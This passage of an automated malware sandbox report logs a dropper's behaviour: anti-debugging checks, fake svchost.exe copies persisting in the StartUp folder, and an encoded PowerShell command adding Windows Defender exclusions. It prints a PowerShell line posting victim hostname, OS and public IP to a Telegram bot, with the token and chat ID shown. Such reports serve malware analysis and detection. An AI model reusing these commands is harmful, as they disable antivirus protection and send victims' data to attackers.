        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AB341C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF669AB341C
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ADEBE0 FindFirstFileExA,3_2_00007FF669ADEBE0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AD106C VirtualQuery,GetSystemInfo,3_2_00007FF669AD106C
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\tg.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeFile opened: C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeFile opened: C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeFile opened: C:\Users\user\AppData\Local\Temp\1BBA.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeAPI call chain: ExitProcess graph end nodegraph_3-27765
        Source: C:\ProgramData\svchost\svchost.exeAPI call chain: ExitProcess graph end nodegraph_10-9583
        Source: C:\ProgramData\svchost\svchost.exeAPI call chain: ExitProcess graph end nodegraph_10-9718
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004014A0 GetCurrentProcess,CheckRemoteDebuggerPresent,7_2_004014A0
        Contains functionality to hide a thread from the debugger
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00401090 NtSetInformationThread ?,00000011,00000000,000000007_2_00401090
        Found API chain indicative of debugger detection
        Source: C:\ProgramData\svchost\svchost.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_10-9365
        Source: C:\ProgramData\svchost\svchost.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_10-9363
        Hides threads from debuggers
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeThread information set: HideFromDebugger
        Source: C:\ProgramData\svchost\svchost.exeThread information set: HideFromDebugger
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeProcess queried: DebugPortJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeProcess queried: DebugPortJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeProcess queried: DebugObjectHandleJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeProcess queried: DebugFlagsJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeProcess queried: DebugPortJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AD2BB0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF669AD2BB0
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_0040A83A LoadLibraryW,GetProcAddress,wcscpy,wcscat,wcslen,CoTaskMemFree,FreeLibrary,wcscat,wcslen,4_2_0040A83A
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_0040DEB0 mov eax, dword ptr fs:[00000030h]7_2_0040DEB0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00405670 mov eax, dword ptr fs:[00000030h]7_2_00405670
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00405670 mov eax, dword ptr fs:[00000030h]7_2_00405670
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00405E10 mov eax, dword ptr fs:[00000030h]7_2_00405E10
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00405E10 mov eax, dword ptr fs:[00000030h]7_2_00405E10
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00405B10 mov eax, dword ptr fs:[00000030h]7_2_00405B10
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00405B10 mov eax, dword ptr fs:[00000030h]7_2_00405B10
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004013D0 mov eax, dword ptr fs:[00000030h]7_2_004013D0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004013A0 mov eax, dword ptr fs:[00000030h]7_2_004013A0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00405B10 mov eax, dword ptr fs:[00000030h]10_2_00405B10
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00405B10 mov eax, dword ptr fs:[00000030h]10_2_00405B10
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00405670 mov eax, dword ptr fs:[00000030h]10_2_00405670
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00405670 mov eax, dword ptr fs:[00000030h]10_2_00405670
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0040DEB0 mov eax, dword ptr fs:[00000030h]10_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_004013D0 mov eax, dword ptr fs:[00000030h]10_2_004013D0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_004013A0 mov eax, dword ptr fs:[00000030h]10_2_004013A0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00405E10 mov eax, dword ptr fs:[00000030h]10_2_00405E10
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00405E10 mov eax, dword ptr fs:[00000030h]10_2_00405E10
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0040DEB0 mov eax, dword ptr fs:[00000030h]18_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00405B10 mov eax, dword ptr fs:[00000030h]18_2_00405B10
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00405B10 mov eax, dword ptr fs:[00000030h]18_2_00405B10
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00405670 mov eax, dword ptr fs:[00000030h]18_2_00405670
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00405670 mov eax, dword ptr fs:[00000030h]18_2_00405670
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00405E10 mov eax, dword ptr fs:[00000030h]18_2_00405E10
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00405E10 mov eax, dword ptr fs:[00000030h]18_2_00405E10
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_004013D0 mov eax, dword ptr fs:[00000030h]18_2_004013D0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_004013A0 mov eax, dword ptr fs:[00000030h]18_2_004013A0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ADFC60 GetProcessHeap,3_2_00007FF669ADFC60
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00401515 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_00401515
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AD2BB0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF669AD2BB0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AD2D90 SetUnhandledExceptionFilter,3_2_00007FF669AD2D90
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AD1F80 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF669AD1F80
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AD6628 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF669AD6628
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_00409950 SetUnhandledExceptionFilter,4_2_00409950
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,4_2_00409930
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_0041140E SetUnhandledExceptionFilter,7_2_0041140E
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_0040E542 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040E542
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00410954 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00410954
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00410954 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00410954
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0041140E SetUnhandledExceptionFilter,10_2_0041140E
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0040E542 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040E542
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0041140E SetUnhandledExceptionFilter,18_2_0041140E
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0040E542 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_0040E542
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00410954 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00410954

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Encrypted powershell cmdline option found
        Source: C:\Users\user\Desktop\setup.exeProcess created: Base64 decoded <#byq#>Add-MpPreference <#gnp#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#uei#> -Force <#cdf#>
        Source: C:\Users\user\Desktop\setup.exeProcess created: Base64 decoded <#byq#>Add-MpPreference <#gnp#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#uei#> -Force <#cdf#>Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ACA9C0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCurrentProcessId,GetCommandLineW,ShellExecuteExW,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF669ACA9C0
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA="Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe" Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\tg.exe "C:\Users\user\AppData\Local\Temp\tg.exe" Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\client.exe "C:\Users\user\AppData\Local\Temp\client.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:05:51, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$env:COMPUTERNAME"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Environment]::OSVersion"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagiaeqbxacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagcabgbwacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajahuazqbpacmapgagac0argbvahiaywblacaapaajagmazabmacmapga="
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7879910740:aaempll82moqqk9txwsc5yk5uz56ixr0bzq/sendmessage' -method post -body @{chat_id='6734985705' ; text=' @new device infected!!!, information: date: 2024-12-22 19:05:51, hostname: user-pc, os: win32nt 10.0.19045.0 microsoft windows nt 10.0.19045.0, architecture: 64-bit, public ip: 8.46.123.189'}"
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagiaeqbxacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagcabgbwacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajahuazqbpacmapgagac0argbvahiaywblacaapaajagmazabmacmapga="Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7879910740:aaempll82moqqk9txwsc5yk5uz56ixr0bzq/sendmessage' -method post -body @{chat_id='6734985705' ; text=' @new device infected!!!, information: date: 2024-12-22 19:05:51, hostname: user-pc, os: win32nt 10.0.19045.0 microsoft windows nt 10.0.19045.0, architecture: 64-bit, public ip: 8.46.123.189'}"Jump to behavior
        Source: setup.exe, 00000000.00000002.1783151107.0000000005C36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Winapi@Windows@DOF_PROGMAN
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ABD484 cpuid 3_2_00007FF669ABD484
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_00007FF669AC9AE4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
